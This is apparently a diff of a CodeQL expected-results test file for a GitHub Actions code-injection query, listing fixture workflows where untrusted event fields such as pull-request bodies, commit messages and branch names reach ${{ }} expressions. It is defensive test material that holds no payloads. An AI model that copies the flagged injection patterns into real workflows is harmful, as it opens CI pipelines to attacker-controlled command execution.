.github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | ${{ env.ISSUE_BODY_PARSED }} | +| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | ${{env.pr_message}} | +| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | ${{ github.event.pages[1].title }} | +| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | ${{ github.event.pages[11].title }} | +| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | ${{ github.event.pages[0].page_name }} | +| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | ${{ github.event.pages[2222].page_name }} | +| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | +| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | +| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | +| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | +| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | ${{ github.event.head_commit.author.email }} | +| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | ${{ github.event.head_commit.author.name }} | +| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | ${{ github.event.head_commit.committer.email }} | +| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | +| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | +| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | +| .github/workflows/push_and_workflow_dispatch.yml:9:19:9:57 | github.event.commits[11].message | .github/workflows/push_and_workflow_dispatch.yml:9:19:9:57 | github.event.commits[11].message | .github/workflows/push_and_workflow_dispatch.yml:9:19:9:57 | github.event.commits[11].message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:9:19:9:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | +| .github/workflows/push_and_workflow_dispatch.yml:10:19:10:62 | github.event.commits[11].author.email | .github/workflows/push_and_workflow_dispatch.yml:10:19:10:62 | github.event.commits[11].author.email | .github/workflows/push_and_workflow_dispatch.yml:10:19:10:62 | github.event.commits[11].author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:10:19:10:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | +| .github/workflows/push_and_workflow_dispatch.yml:11:19:11:61 | github.event.commits[11].author.name | .github/workflows/push_and_workflow_dispatch.yml:11:19:11:61 | github.event.commits[11].author.name | .github/workflows/push_and_workflow_dispatch.yml:11:19:11:61 | github.event.commits[11].author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:11:19:11:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | +| .github/workflows/push_and_workflow_dispatch.yml:12:19:12:57 | github.event.head_commit.message | .github/workflows/push_and_workflow_dispatch.yml:12:19:12:57 | github.event.head_commit.message | .github/workflows/push_and_workflow_dispatch.yml:12:19:12:57 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:12:19:12:57 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | +| .github/workflows/push_and_workflow_dispatch.yml:13:19:13:62 | github.event.head_commit.author.email | .github/workflows/push_and_workflow_dispatch.yml:13:19:13:62 | github.event.head_commit.author.email | .github/workflows/push_and_workflow_dispatch.yml:13:19:13:62 | github.event.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:13:19:13:62 | github.event.head_commit.author.email | ${{ github.event.head_commit.author.email }} | +| .github/workflows/push_and_workflow_dispatch.yml:14:19:14:61 | github.event.head_commit.author.name | .github/workflows/push_and_workflow_dispatch.yml:14:19:14:61 | github.event.head_commit.author.name | .github/workflows/push_and_workflow_dispatch.yml:14:19:14:61 | github.event.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:14:19:14:61 | github.event.head_commit.author.name | ${{ github.event.head_commit.author.name }} | +| .github/workflows/push_and_workflow_dispatch.yml:15:19:15:65 | github.event.head_commit.committer.email | .github/workflows/push_and_workflow_dispatch.yml:15:19:15:65 | github.event.head_commit.committer.email | .github/workflows/push_and_workflow_dispatch.yml:15:19:15:65 | github.event.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:15:19:15:65 | github.event.head_commit.committer.email | ${{ github.event.head_commit.committer.email }} | +| .github/workflows/push_and_workflow_dispatch.yml:16:19:16:64 | github.event.head_commit.committer.name | .github/workflows/push_and_workflow_dispatch.yml:16:19:16:64 | github.event.head_commit.committer.name | .github/workflows/push_and_workflow_dispatch.yml:16:19:16:64 | github.event.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:16:19:16:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | +| .github/workflows/push_and_workflow_dispatch.yml:17:19:17:65 | github.event.commits[11].committer.email | .github/workflows/push_and_workflow_dispatch.yml:17:19:17:65 | github.event.commits[11].committer.email | .github/workflows/push_and_workflow_dispatch.yml:17:19:17:65 | github.event.commits[11].committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:17:19:17:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | +| .github/workflows/push_and_workflow_dispatch.yml:18:19:18:64 | github.event.commits[11].committer.name | .github/workflows/push_and_workflow_dispatch.yml:18:19:18:64 | github.event.commits[11].committer.name | .github/workflows/push_and_workflow_dispatch.yml:18:19:18:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:18:19:18:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | +| .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | +| .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | ${{ env.log }} | +| .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | .github/workflows/reusable-workflow-1.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | +| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | +| .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test20.yml:15:54:15:94 | github.event.pull_request.head.ref | .github/workflows/test20.yml:15:54:15:94 | github.event.pull_request.head.ref | .github/workflows/test20.yml:15:54:15:94 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test20.yml:15:54:15:94 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | +| .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | +| .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | +| .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | edges | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:23:15:23:33 | inputs.taint | provenance | | | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | provenance | | @@ -697,62 +756,3 @@ nodes subpaths | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | -#select -| .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/actions/action7/action.yml:77:15:77:36 | inputs.spelling | .github/actions/action7/action.yml:77:15:77:36 | inputs.spelling | .github/actions/action7/action.yml:77:15:77:36 | inputs.spelling | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action7/action.yml:77:15:77:36 | inputs.spelling | ${{ inputs.spelling }} | -| .github/actions/action7/action.yml:214:41:214:69 | inputs.github_username | .github/actions/action7/action.yml:214:41:214:69 | inputs.github_username | .github/actions/action7/action.yml:214:41:214:69 | inputs.github_username | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action7/action.yml:214:41:214:69 | inputs.github_username | ${{ inputs.github_username }} | -| .github/actions/action7/action.yml:215:41:215:66 | inputs.github_email | .github/actions/action7/action.yml:215:41:215:66 | inputs.github_email | .github/actions/action7/action.yml:215:41:215:66 | inputs.github_email | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action7/action.yml:215:41:215:66 | inputs.github_email | ${{ inputs.github_email }} | -| .github/actions/action7/action.yml:217:25:217:60 | github.head_ref \|\| github.ref | .github/actions/action7/action.yml:217:25:217:60 | github.head_ref \|\| github.ref | .github/actions/action7/action.yml:217:25:217:60 | github.head_ref \|\| github.ref | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action7/action.yml:217:25:217:60 | github.head_ref \|\| github.ref | ${{ github.head_ref \|\| github.ref }} | -| .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | ${{ steps.changed-files1.outputs.all_changed_files }} | -| .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | ${{ steps.changed-files3.outputs.all_changed_files }} | -| .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | ${{ steps.changed-files5.outputs.all_changed_files }} | -| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | ${{ env.ISSUE_BODY_PARSED }} | -| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | ${{env.pr_message}} | -| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | ${{ github.event.pages[1].title }} | -| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | ${{ github.event.pages[11].title }} | -| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | ${{ github.event.pages[0].page_name }} | -| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | ${{ github.event.pages[2222].page_name }} | -| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | -| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | -| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | -| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | -| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | ${{ github.event.head_commit.author.email }} | -| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | ${{ github.event.head_commit.author.name }} | -| 